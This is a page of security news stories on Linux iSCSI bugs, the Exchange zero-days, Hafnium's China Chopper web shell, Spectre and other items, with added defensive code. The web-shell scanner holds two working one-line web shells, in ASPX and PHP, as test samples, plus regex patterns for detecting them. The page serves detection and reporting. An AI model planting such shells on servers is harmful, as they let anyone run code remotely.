More stories

  •

    Old Linux storage bugs, new security patches

    One of the good things about Linux is that it supports so much old hardware. With just a bit of work, there’s almost no computing hardware that can’t run Linux. That’s the good news. The bad news is that ancient security holes sometimes turn up in old code. That’s the case with the Linux kernel’s iSCSI (Internet Small Computer System Interface) transport code, the driver layer that carries SCSI commands over IP networks.

    A trio of security holes, CVE-2021-27365, CVE-2021-27364, and CVE-2021-27363, was found by researchers at the security company GRIMM in an almost forgotten corner of the mainline Linux kernel, drivers/scsi/scsi_transport_iscsi.c. The first two carry a Common Vulnerability Scoring System (CVSS) score above 7, which is high. While you may not have used a SCSI or iSCSI drive in ages, the bugs date back to 2006, so they have been sitting in the kernel for 15 years. One of them can be used in a Local Privilege Escalation (LPE) attack; in other words, a normal user could use it to become the root user. The third, lower-scored bug leaks a kernel pointer (the address of an iscsi_transport structure) through sysfs, which helps an attacker defeat kernel address-space layout randomisation.
    Don’t let the word “local” fool you. As Adam Nichols, Principal of Software Security at GRIMM, said: “These issues make the impact of any remotely exploitable vulnerability more severe. Enterprises running publicly facing servers would be at the most risk.”
    True, the vulnerable iSCSI code isn’t loaded by default on most desktop distros. But it’s a different story on Linux servers. If your server needs RDMA (Remote Direct Memory Access), a high-throughput, low-latency networking technology, it will probably have the rdma-core package installed, and on several distributions that package’s configuration lets the kernel load the iSCSI transport modules that contain the vulnerable code on demand.
    Whoops!
    Exploiting the hole isn’t easy, but GRIMM has released a proof of concept exploit, which shows how to exploit two of the vulnerabilities. Now that the way has been shown you can count on attackers giving it a try. 
    In particular, CentOS 8, Red Hat Enterprise Linux (RHEL) 8, and Fedora systems are vulnerable when the rdma-core package is installed, because unprivileged users can then trigger loading of the required modules. SUSE Linux Enterprise Server (SLES) can also be attacked, as can Ubuntu 18.04 and earlier. And, of course, if you’re actually using iSCSI storage, the vulnerable transport module is already loaded.
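    Before patching, an administrator usually wants to know whether a given box is even exposed: is the scsi_transport_iscsi module loaded, what is keeping it loaded, and can an ordinary user read the sysfs handle that the pointer leak exposes. The following triage script is an added example written for this page, not GRIMM’s code. It parses /proc/modules and probes /sys/class/iscsi_transport; the /proc/modules sample embedded in it is constructed so the script runs anywhere.

```python
"""Triage check for the iSCSI transport exposure discussed above.

Added example, not GRIMM's code. It parses /proc/modules to see whether
scsi_transport_iscsi is loaded and which modules are keeping it loaded,
and tries to read the sysfs 'handle' attribute that CVE-2021-27363 leaks.
The /proc/modules sample below is constructed.
"""
import os
from dataclasses import dataclass, field

VULN_MODULE = "scsi_transport_iscsi"
ISCSI_SYSFS = "/sys/class/iscsi_transport"

# Constructed sample in /proc/modules format: name size refcount users state address
SAMPLE_PROC_MODULES = """\
ib_iser 49152 0 - Live 0x0000000000000000
libiscsi 61440 1 ib_iser, Live 0x0000000000000000
scsi_transport_iscsi 110592 2 ib_iser,libiscsi, Live 0x0000000000000000
rdma_cm 65536 1 ib_iser, Live 0x0000000000000000
ext4 737280 1 - Live 0x0000000000000000
"""


@dataclass
class ModuleInfo:
    name: str
    size: int
    refcount: int
    used_by: list = field(default_factory=list)


def parse_proc_modules(text):
    """Parse /proc/modules text into a dict keyed by module name."""
    mods = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        name, size, refcount, users = parts[:4]
        # the users column is '-' or a comma-separated list with a trailing comma
        used_by = [] if users == "-" else [u for u in users.split(",") if u]
        mods[name] = ModuleInfo(name, int(size), int(refcount), used_by)
    return mods


def iscsi_exposure(mods):
    """Return (loaded, dependents): whether the vulnerable module is in the
    kernel, and which modules hold a reference to it."""
    info = mods.get(VULN_MODULE)
    if info is None:
        return False, []
    return True, sorted(info.used_by)


def probe_handles(sysfs_root=ISCSI_SYSFS):
    """Try to read each registered transport's 'handle' attribute as the
    current user. Unpatched kernels hand any user the kernel pointer; the
    fix returns EACCES unless the reader has CAP_SYS_ADMIN, so run this as
    an unprivileged user to learn anything."""
    results = {}
    if not os.path.isdir(sysfs_root):
        return results
    for transport in sorted(os.listdir(sysfs_root)):
        path = os.path.join(sysfs_root, transport, "handle")
        try:
            with open(path) as fh:
                results[transport] = fh.read().strip()
        except PermissionError:
            results[transport] = "denied"
        except OSError:
            continue
    return results


if __name__ == "__main__":
    try:
        with open("/proc/modules") as fh:
            text = fh.read()
    except OSError:
        text = SAMPLE_PROC_MODULES  # not on Linux: fall back to the constructed sample
    loaded, deps = iscsi_exposure(parse_proc_modules(text))
    print(f"{VULN_MODULE} loaded: {loaded}; held by: {deps or 'nothing'}")
    print("iscsi_transport handles:", probe_handles() or "none registered")
```

    A module that is loaded but held by nothing can be unloaded with rmmod as a stopgap; one held by ib_iser or libiscsi is in use and the only real fix is the kernel update.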

    Fortunately, these bugs have already been patched. So, unless you like taking chances with your Linux servers, I’d advise you to patch your Linux distributions as soon as possible.

  •

    Microsoft Exchange Server zero-day attacks: Malicious software found on 2,300 machines in the UK

    Any organisations which have yet to apply the critical updates that fix the zero-day vulnerabilities in Microsoft Exchange Server are being urged to do so immediately, as what is described as an ‘increasing range’ of hacking groups attempts to exploit unpatched networks.


    An alert from the UK’s National Cyber Security Centre (NCSC) warns that all organisations using affected versions of Microsoft Exchange Server should apply the latest updates as a matter of urgency, in order to protect their networks from cyber attacks including ransomware.
    The NCSC says it believes that over 3,000 Microsoft Exchange email servers used by organisations in the UK haven’t had the critical security patches applied, so remain at risk from cyber attackers looking to take advantage of the vulnerabilities. 
    If organisations can’t install the updates, the NCSC recommends blocking untrusted connections to the Exchange server on port 443 and configuring Exchange so that it can only be accessed remotely via a VPN.
    It’s also recommended that all organisations which are using an affected version of Microsoft Exchange should proactively search their systems for signs of compromise, in case attackers have been able to exploit the vulnerabilities before the updates were installed.
    That’s because installing the update after a compromise will not remove the access that attackers have already gained. NCSC officials said they have helped detect and remove malware related to the attack from more than 2,300 machines at businesses in the UK.

    “We are working closely with industry and international partners to understand the scale and impact of UK exposure, but it is vital that all organisations take immediate steps to protect their networks,” said Paul Chichester, director for operations at the NCSC.
    “Whilst this work is ongoing, the most important action is to install the latest Microsoft updates,” he added.
    Microsoft first became aware of the Exchange vulnerabilities in January and issued patches to tackle them on March 2, with organisations told to apply them as soon as possible.
    It’s thought that tens of thousands of organisations around the world have had their email servers compromised by the cyber attacks targeting Microsoft Exchange, potentially putting large amounts of sensitive information into the hands of hackers.
    Cybersecurity researchers at Microsoft have attributed the campaign to a state-sponsored advanced persistent threat (APT) hacking group working out of China, dubbed Hafnium.
    Since the emergence of the vulnerabilities, a number of state-sponsored and cyber criminal hacking groups have also rushed to target Microsoft Exchange servers in order to gain access before patches are applied.
    Cyber criminals have even distributed a new form of ransomware – known as DearCry – designed specifically to target vulnerable Exchange servers, something which could cause a major problem for organisations which haven’t applied the latest Exchange security updates.
    “Organisations should also be alive to the threat of ransomware and familiarise themselves with our guidance. Any incidents affecting UK organisations should be reported to the NCSC,” said Chichester.

  •

    Google fails to quash Incognito mode user tracking, privacy lawsuit

    Google has failed to have a proposed class-action lawsuit quashed that alleges the company violated user privacy by collecting data in Incognito browser modes. 

    The lawsuit, originally filed in June 2020, claims that Google tracks and collects consumer browsing history, among other activities, even when Chrome’s Incognito or other privacy-based browser sessions are in use. 
    Filed in the US District Court for the Northern District of California, the class-action complaint alleges that when an individual visits a web page that loads Google services, such as plug-ins, Google Analytics, and Google Ad Manager, data is collected no matter the browser mode.
    The lawsuit says that Google is “intercepting, tracking, and collecting communications” and harvesting the data of users without obtaining consent, as noted by sister site CNET.
    In total, the class-action lawsuit is seeking $5 billion from Google and parent company Alphabet. 
    Google sought to have the case dismissed, but on Friday presiding US District Judge Lucy Koh denied the motion, writing in her ruling that the tech giant “did not notify users that Google engages in the alleged data collection while the user is in private browsing mode,” as reported by Bloomberg.
    In a statement, a Google spokesperson said the company “strongly dispute[s] these claims” and will “defend ourselves vigorously against them.”

    “As we clearly state each time you open a new Incognito tab, websites might be able to collect information about your browsing activity during your session,” the spokesperson added. Chrome displays that warning on the page shown whenever a new Incognito window is opened.

    In October, Google became the target of an antitrust lawsuit filed by the US Department of Justice (DoJ). The US agency claims that Google holds an “illegal” monopoly over online search services and advertising, and further accused the firm of “exclusionary practices that are harmful to competition.”

  •

    Hafnium’s China Chopper: a ‘slick’ and tiny web shell for creating server backdoors

    Researchers have provided insight into China Chopper, a web shell used by the state-sponsored Hafnium hacking group.

    Hafnium is a group of cyberattackers originating from China. The collective recently came into the spotlight when Microsoft linked it to attacks exploiting four zero-day vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server.
    Microsoft says that Hafnium tends to strike targets in the United States, focusing on industries including defense, research, law, and higher education. While believed to be based in China, the group uses leased virtual private servers (VPS) in the US.
    Due to the renewed interest in Hafnium, on Monday, Trustwave published an analysis of one of the group’s tools, China Chopper, which is a web shell widely used for post-exploitation activities. 
    The web shell has been detected in Exchange Server-related attacks alongside DearCry ransomware deployment.
    China Chopper is not new and has been in the wild for at least a decade. The tiny web shell, coming in at only four kilobytes, contains two key components: a web shell command-and-control (C2) client binary and a text-based web shell payload, the server component.
    “The text-based payload is so simple and short that an attacker could type it by hand right on the target server — no file transfer needed,” the team notes.

    FireEye calls the tool a “slick little web shell that does not get enough exposure and credit for its stealth.”
    There are different variants of China Chopper in the wild written in different languages, such as ASP, ASPX, PHP, JSP, and CFM, but they all have similar functions. The Active Server Page Extended (ASPX) variety, once dropped on a server that has already been compromised via an exploit, is typically no more than one line of code.
    Red Canary notes that the .aspx web shell names are generally made up of eight random characters. 
    Examining a China Chopper sample, Trustwave describes how, when an HTTP POST request arrives, the script calls the “eval” function to execute the string carried in a POST request variable.
    “The POST request variable is named “secret,” meaning any JScript contained in the “secret” variable will be executed on the server,” the researchers say. “JScript is implemented as an active scripting engine allowing the language to use ActiveX objects on the client it is running on. This can be and is abused by attackers to achieve reverse shells, file management, process execution, and much more.”
    The client component of China Chopper is usually hosted on an attacker’s system to facilitate communication, and can be used for tasks such as running a virtual terminal that launches commands via cmd.exe, downloading files, and executing other malicious scripts.
    The researchers also noted the .NET DLLs that the ASP.NET runtime compiles from the web shell’s .aspx source, left behind on compromised servers.
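    The description above (a one-line page that hands a POST variable to eval) and the NCSC’s advice in the earlier story to search Exchange servers for signs of compromise both point at the same practical task: hunting for these shells on disk. The scanner below is an added example written for this page; it is not Trustwave’s, Red Canary’s or Microsoft’s tooling. It treats eval of a request-supplied string as decisive and a JScript page directive, a tiny one-line body and an eight-character random .aspx name (Red Canary’s observation) as supporting indicators. The PHP pattern goes beyond the ASPX sample discussed in the text; the sample files and the POST variable names are constructed.

```python
"""Hunt for one-line eval-style web shells of the kind Trustwave describes.

Added example; not Trustwave's, Red Canary's or Microsoft's tooling. The
sample files below are constructed.
"""
import re
from pathlib import Path

# ASPX/JScript: eval(Request.Item["x"], "unsafe"), eval(Request["x"]), eval(Request.Form["x"])
ASPX_EVAL = re.compile(r'eval\s*\(\s*Request(?:\.Item|\.Form|\[)\s*[\["]', re.IGNORECASE)
# PHP variant: @eval($_POST['x'])
PHP_EVAL = re.compile(r"@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[", re.IGNORECASE)
# Page directive that switches an .aspx page to the JScript engine
JSCRIPT_DIRECTIVE = re.compile(r'<%@\s*Page\s+Language\s*=\s*"?jscript', re.IGNORECASE)
# Eight alphanumeric characters followed by .aspx (Red Canary's naming observation)
RANDOM_NAME = re.compile(r"^[a-z0-9]{8}\.aspx$", re.IGNORECASE)
TINY_BYTES = 4096  # China Chopper payloads are well under 4 KB


def indicators(name, content):
    """Return the list of indicators that fire on one file."""
    hits = []
    if ASPX_EVAL.search(content) or PHP_EVAL.search(content):
        hits.append("eval of request variable")
    if JSCRIPT_DIRECTIVE.search(content):
        hits.append("JScript page directive")
    if RANDOM_NAME.match(Path(name).name):
        hits.append("eight-character random filename")
    if (len(content.encode()) < TINY_BYTES and content.count("\n") <= 2
            and "eval" in content.lower()):
        hits.append("tiny one-line body with eval")
    return hits


def verdict(hits):
    """eval of attacker-supplied input is decisive; otherwise two weak
    indicators together are worth a human look."""
    if "eval of request variable" in hits:
        return "shell"
    if len(hits) >= 2:
        return "review"
    return "clean"


def scan(files):
    """Scan a {name: content} mapping; returns {name: (verdict, hits)}."""
    out = {}
    for name, content in files.items():
        hits = indicators(name, content)
        out[name] = (verdict(hits), hits)
    return out


def scan_directory(root, suffixes=(".aspx", ".asp", ".php", ".jsp")):
    """Walk a web root (for example an Exchange server's IIS directories)
    and scan every script file; unreadable files are skipped."""
    files = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in suffixes and path.is_file():
            try:
                files[str(path)] = path.read_text(errors="replace")
            except OSError:
                continue
    return scan(files)


# Constructed samples
SAMPLES = {
    # one-line JScript shell that evals the POST variable named in the article
    "ab3x9kq2.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["secret"],"unsafe");%>',
    # classic PHP variant
    "cfg.php": "<?php @eval($_POST['secret']);?>",
    # legitimate page: reads a form field but never evaluates it
    "default.aspx": ('<%@ Page Language="C#" %>\n<html><body><% string n = Request.Form["name"];'
                     ' Response.Write(Server.HtmlEncode(n)); %></body></html>\n'),
    # noisy but not request-driven: random-looking name, JScript, eval of a constant
    "helper12.aspx": '<%@ Page Language="Jscript"%>\n<% var x = eval("1+1"); Response.Write(x); %>\n',
}

if __name__ == "__main__":
    for name, (result, hits) in scan(SAMPLES).items():
        print(f"{result:6} {name}: {', '.join(hits) or '-'}")
```

    The point of the two-tier verdict is that filename length and page language are weak signals on their own (plenty of legitimate pages have eight-character names), whereas eval of anything taken from the request is never legitimate on a mail server and deserves an immediate look at IIS logs for POSTs to that path.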
    TEMP.Periscope/Leviathan, APT41/Double Dragon, and Bronze Union, among other advanced persistent threat (APT) groups, have been connected to the use of this popular web shell in the past.
    Red Canary has also identified a cluster of Microsoft Exchange Server attacks built around this backdoor. In the cluster, dubbed “Sapphire Pigeon,” multiple web shells are dropped on compromised servers at different times, in some cases days before post-exploitation activity begins.
    At least 10 APT groups are thought to be exploiting the critical Exchange Server vulnerabilities, and at least 82,000 servers remain unpatched, according to Microsoft.
    Last week, Check Point Research said the rate of attacks leveraging the vulnerabilities was doubling every two to three hours. 

  •

    Google: This Spectre proof-of-concept shows how dangerous these attacks can be

    Google has released proof-of-concept (PoC) code demonstrating that Spectre side-channel attacks against a browser’s JavaScript engine are practical and can leak information from the browser’s memory.
    In 2018, Google detailed two variants of Spectre, one of which, variant 1 (CVE-2017-5753, the bounds-check bypass), concerned JavaScript exploitation against browsers. Spectre abuses speculative execution, a performance feature of modern CPUs, to leak secrets such as passwords from one site to another, malicious site.
    Web developers can visit Google’s new page – at https://leaky.page – to see a demo of Spectre in JavaScript, a video demo on YouTube and a detailed write up of the PoC on GitHub. 
    Google released the PoC so that developers of web applications understand why it is important to deploy application-level mitigations. At a high level, as a Google-authored W3C document puts it, a developer’s “data must not unexpectedly enter an attacker’s process”.
    While the PoC demonstrates the JavaScript Spectre attack against Chrome 88’s V8 JavaScript engine on an Intel Core i7-6500U ‘Skylake’ CPU running Linux, Google notes that it can easily be tweaked for other CPUs, browser versions and operating systems; it even worked on Apple’s M1 Arm CPU with minor modifications. The attack can leak data at a rate of 1kB per second.
    The chief components of the PoC are a Spectre variant 1 “gadget”, code that triggers attacker-controlled transient execution, and a side channel, “a way to observe side effects of the transient execution”.

    “The web platform relies on the origin as a fundamental security boundary, and browsers do a pretty good job at preventing explicit leakage of data from one origin to another,” explained Google’s Mike West. 
    “Attacks like Spectre, however, show that we still have work to do to mitigate implicit data leakage. The side-channels exploited through these attacks prove that attackers can read any data which enters a process hosting that attackers’ code. These attacks are quite practical today, and pose a real risk to users.”

    While Google and other browser vendors have developed mitigations for Spectre, such as Site Isolation, these do not prevent exploitation of Spectre, explain Stephen Röttger and Artur Janc, Google information security engineers.
    “Rather, [these mitigations] protect sensitive data from being present in parts of the memory from which they can be read by the attacker,” they note in a blogpost.  
    “While operating system and web browser developers have implemented important built-in protections where possible (including Site Isolation with out-of-process iframes and Cross-Origin Read Blocking in Google Chrome, or Project Fission in Firefox), the design of existing web APIs still makes it possible for data to inadvertently flow into an attacker’s process,” they explain. 
    Google has also released a new prototype Chrome extension called Spectroscope that scans an application to find resources that may require enabling additional defenses.  
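    What “data must not unexpectedly enter an attacker’s process” means for an application is concrete: refuse to serve sensitive responses to requests that come from another site, and mark the responses so the browser will not load them into a process that also hosts cross-origin code. The snippet below is an added example written for this page, not Google’s PoC, Spectroscope or any vendor code. It implements a resource isolation policy using the browser’s Fetch Metadata (Sec-Fetch-*) request headers and emits Cross-Origin-Resource-Policy, Cross-Origin-Opener-Policy and Cross-Origin-Embedder-Policy response headers; these are this editor’s reading of the W3C guidance the article cites, and the request header sets are constructed.

```python
"""Keep sensitive responses out of an attacker's renderer process.

Added example, not Google's PoC, Spectroscope, or any vendor code. The
request header sets below are constructed to look as a browser would send
them.
"""

SAFE_SITES = {"same-origin", "same-site", "none"}  # 'none' = user-initiated (typed URL, bookmark)


def allow_request(headers, method="GET"):
    """Decide whether to serve a sensitive resource. Returns (allowed, reason)."""
    site = headers.get("Sec-Fetch-Site")
    mode = headers.get("Sec-Fetch-Mode")
    dest = headers.get("Sec-Fetch-Dest")
    if site is None:
        # Browser sends no Fetch Metadata: cannot tell, so fall through to the
        # application's other defences (SameSite cookies, CSRF tokens).
        return True, "no Fetch Metadata"
    if site in SAFE_SITES:
        return True, f"Sec-Fetch-Site={site}"
    # Cross-site: only a top-level GET navigation (a link from another site)
    # is acceptable. Cross-site subresource loads (img, script, fetch) and
    # cross-site frames would pull the response into a process hosting the
    # other site's code, which is exactly what Spectre exploits.
    if mode == "navigate" and method.upper() == "GET" and dest == "document":
        return True, "cross-site top-level navigation"
    return False, f"cross-site {mode or 'unknown'} request for {dest or 'unknown'} refused"


def isolation_headers(kind):
    """Response headers for a resource of the given kind.

    private  - CORP same-origin: the browser refuses to hand the bytes to
               other origins' no-cors loads, even where CORB would not apply.
    public   - static assets meant to be embedded by other sites.
    document - an HTML page: also isolate its browsing context group (COOP)
               and require everything it embeds to opt in (COEP).
    """
    base = {"X-Content-Type-Options": "nosniff"}  # lets CORB trust the Content-Type
    if kind == "public":
        return {**base, "Cross-Origin-Resource-Policy": "cross-origin"}
    if kind == "private":
        return {**base, "Cross-Origin-Resource-Policy": "same-origin"}
    if kind == "document":
        return {**base,
                "Cross-Origin-Resource-Policy": "same-origin",
                "Cross-Origin-Opener-Policy": "same-origin",
                "Cross-Origin-Embedder-Policy": "require-corp"}
    raise ValueError(f"unknown resource kind: {kind}")


def serve(kind, request_headers, method="GET"):
    """Combine both checks: returns (status, response_headers)."""
    if kind != "public":
        allowed, reason = allow_request(request_headers, method)
        if not allowed:
            # X-Isolation-Reason is an illustrative diagnostic header, not a standard one
            return 403, {"X-Isolation-Reason": reason}
    return 200, isolation_headers(kind)


# Constructed requests, labelled as a browser would label them
REQUESTS = {
    "same-origin fetch": {"Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty"},
    "attacker img tag": {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "no-cors", "Sec-Fetch-Dest": "image"},
    "attacker iframe": {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "iframe"},
    "link from mail": {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "document"},
    "legacy browser": {},
}

if __name__ == "__main__":
    for label, hdrs in REQUESTS.items():
        status, _ = serve("private", hdrs)
        print(f"{status} {label}: {allow_request(hdrs)[1]}")
```

    The navigation exception is deliberately narrower than some published policies, which also admit cross-site iframes: a sensitive page framed by another site is both a clickjacking target and a resource that has been invited into another site’s page, so it is refused here and can be re-enabled per route if an application genuinely needs it.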
    Röttger and Janc note that the Variant 1 gadget can be mitigated at a software level. However, the V8 team has found that mitigation of Spectre Variant 4 or Speculative Store Bypass (SSB) is “simply infeasible in software”.

  •

    Microsoft investigates potential ties between partner security firm, Exchange Server attack code leak

    Microsoft is reportedly investigating a potential partner leak that could have exacerbated the current wave of attacks against Microsoft Exchange servers. 

    The Redmond giant is examining whether potentially “sensitive information” required to conduct the attacks was obtained through “private disclosures it made with some of its security partners,” according to the Wall Street Journal. 
    On March 2, Microsoft issued emergency patches to tackle four zero-day vulnerabilities in Microsoft Exchange Server which were being actively exploited in the wild. 
    The critical bugs were disclosed privately in January, and since then, exploit usage has gained traction to the point researchers estimate that tens of thousands of businesses worldwide have been impacted.
    Exploitation of the zero-days was originally attributed to Hafnium, a suspected state-sponsored Chinese hacking group. Now, however, proof-of-concept (PoC) code has been released, more advanced persistent threat (APT) groups are trying to capitalize on the situation, and ransomware is being deployed in some attacks.
    PoC code is also reportedly the subject of Microsoft’s latest investigation. Microsoft is examining whether concept attack code that the company sent privately to partners in the Microsoft Active Protections Program (MAPP) was leaked, whether deliberately or accidentally.
    The PoC attack code was sent to antivirus and other cybersecurity firms on February 23, before the patches were released, to give partner companies advance information. However, some of the tools used in attacks that began a week later appear to have “similarities” to the private PoC, according to the publication.

    Approximately 80 organizations participate in the MAPP program.
    In a blog post dated March 12, Microsoft said that protecting vulnerable Exchange servers is now a “critical” issue and this is why the company recently released patches to also fix out-of-support versions of Exchange. 
    However, applying patches isn’t enough as it will not eradicate existing infections. As a result, Microsoft also recommends investigating for signs of compromise on Exchange servers.
    Microsoft is now working with RiskIQ to track the number of servers that are internet-facing, unpatched, and still vulnerable to attack. As of March 12, approximately 82,000 servers had still not been updated.
    “Microsoft is deeply committed to supporting our customers against these attacks, to innovating on our security approach, and to partnering closely with governments and the security industry to help keep our customers and communities secure,” the company commented.
    The Biden Administration has warned organizations that they have “hours, not days” to patch their systems. Private sector players have been invited to participate in a task force dedicated to investigating the situation. 
    Update 12.32 pm GMT: A Microsoft spokesperson told ZDNet:
    “We are looking at what might have caused the spike of malicious activity and have not yet drawn any conclusions. We have seen no indications of a leak from Microsoft related to this attack.”

  •

    Sky Global CEO indicted over encrypted chat drug trafficking, calls allegations an 'outrage'

    The indicted chief executive of the Sky Global encrypted chat service has claimed that accusations of his participation in criminal activity are an attempt to erode “the fundamental right to privacy.”

    On Friday, the US Department of Justice (DoJ) revealed an indictment, filed in the Southern District of California, against Sky Global’s CEO, Jean-Francois Eap, as well as a former distributor of Sky Global devices, Thomas Herdman. 
    US prosecutors claim the pair “knowingly and intentionally participated” in a criminal ring that distributed narcotics by facilitating the “sale and service of encrypted communications devices.”
    The international distribution of heroin, cocaine, and methamphetamine is specifically mentioned in the complaint. 
    The indictment, returned by a federal grand jury, accuses the pair of conspiracy to violate the federal Racketeer Influenced and Corrupt Organizations Act (RICO), and warrants have now been issued for their arrest. 
    Canada-based Sky Global is a provider of custom handsets and the developer of Sky ECC, a subscription-based end-to-end encrypted messaging application. 
    Last week, Europol announced that law enforcement had broken the encryption of the network and had used client communication records to initiate a criminal takedown on March 9, leading to a “large number of arrests” as well as the seizure of cash and drugs.

    Sky Global, for its part, denied these claims, instead blaming a “disgruntled” former reseller of Sky devices and a scheme to distribute a fake, and therefore insecure, version of the Sky ECC app via skyecc.eu.
    According to the US indictment, “Sky Global’s devices are specifically designed to prevent law enforcement from actively monitoring the communications between members of transnational criminal organizations involved in drug trafficking and money laundering,” and the vendor “guarantees that messages stored on its devices can and will be remotely deleted by the company if the device is seized by law enforcement or otherwise compromised.”
    The DoJ alleges that Sky Global has made hundreds of millions of dollars in profit by “facilitating” criminal activity. 
    Suzanne Turner, FBI Special Agent in Charge of the San Diego Field Office, said that the indictment is “another major strike against transnational crime.”
    Eap and Herdman, both said to be in Vancouver, Canada, face a maximum penalty of life in prison if arrested and found guilty. 
    In response, Eap published a statement on Sunday, claiming that he only found out about the US indictment through media reports. The CEO has branded the allegations as false, adding that the situation highlights the “erosion of the right to privacy.”
    “Sky Global’s technology works for the good of all. It was not created to prevent the police from monitoring criminal organizations; it exists to prevent anyone from monitoring and spying on the global community,” Eap commented. “The indictment against me personally in the US is an example of the police and the government trying to vilify anyone who takes a stance against unwarranted surveillance.”
    Furthermore, Eap says that he and his company are being “targeted” because they “build tools to protect the fundamental right to privacy.”
    Over the coming days, the executive intends to put his efforts toward clearing his name of the allegations. 
    “We do not condone illegal or unethical behavior by our partners or customers,” Eap says. “To brand anyone who values privacy and freedom of speech as a criminal is an outrage.”

  •

    US federal judge issues injunction to temporarily remove Xiaomi ban

    A US federal court has temporarily blocked the Department of Defense from placing restrictions on the ability for domestic companies to invest in Xiaomi.
    The presiding judge, District Judge Rudolph Contreras, issued a preliminary injunction over the weekend that temporarily blocks enforcement of Xiaomi’s designation as a Communist Chinese military company (CCMC).
    Companies placed on the CCMC list are subject to a Donald Trump executive order that came into force in November last year. The executive order prohibits US persons from trading and investing in any of the listed companies and bans trading in any new companies once the US has placed the CCMC label on them.
    The injunction was granted because the judge found that Xiaomi was likely to suffer “irreparable harm” without the relief.
    In making his decision, Contreras explained that the factors of Xiaomi’s stock price dropping by 9.5% since the CCMC designation, various banks including Morgan Stanley, JP Morgan Chase, and Goldman Sachs suspending trading of Xiaomi shares, and the company losing contracts around the world, when viewed together, indicated the company had already suffered “irreparable harm” as a result of the designation.
    Contreras added that the Department of Defense memorandum that led to Xiaomi being added to the CCMC list rested on “shaky ground”.
    “[The memorandum] does not explicitly identify the agency’s source of authority that governs the CCMC designation process, and when the memo does invoke the relevant statutory language, the excerpted language is quoted incorrectly. These errors do not inspire confidence in the fastidiousness of the agency’s decision-making process,” he said.

    Xiaomi was placed onto the CCMC list in mid-January after Defense accused the company of “appearing to be [a] civilian entity” in order to procure advanced technologies in support of the modernisation goals of the Chinese military. 
    Referring to these national security concerns, Contreras said he was “somewhat skeptical that weighty national security interests are actually implicated here”.
    “Taken together, the Court concludes that Defendants have not made the case that the national security interests at stake here are compelling,” he wrote.
    Since the new year, US entities such as the New York Stock Exchange have struggled with the consequences and interpretation of the CCMC list. Over the course of January, the exchange said it would delist a trio of Chinese telcos, then changed its mind, then reverted to its original decision.
    Other Chinese companies currently on the list include Huawei, Hikvision, Inspur, Panda Electronics, and Semiconductor Manufacturing International Corporation.
    In a statement, Xiaomi said it was pleased with the outcome, but would continue its legal fight with the Department of Defense until Xiaomi was officially taken off the CCMC list.
    “We believe that the inclusion of Xiaomi in the list of Chinese military-related enterprises is an arbitrary and arbitrary decision, and the judge also agreed with it. We will continue to ask the court to finally rule that the decree is invalid for Xiaomi,” it said.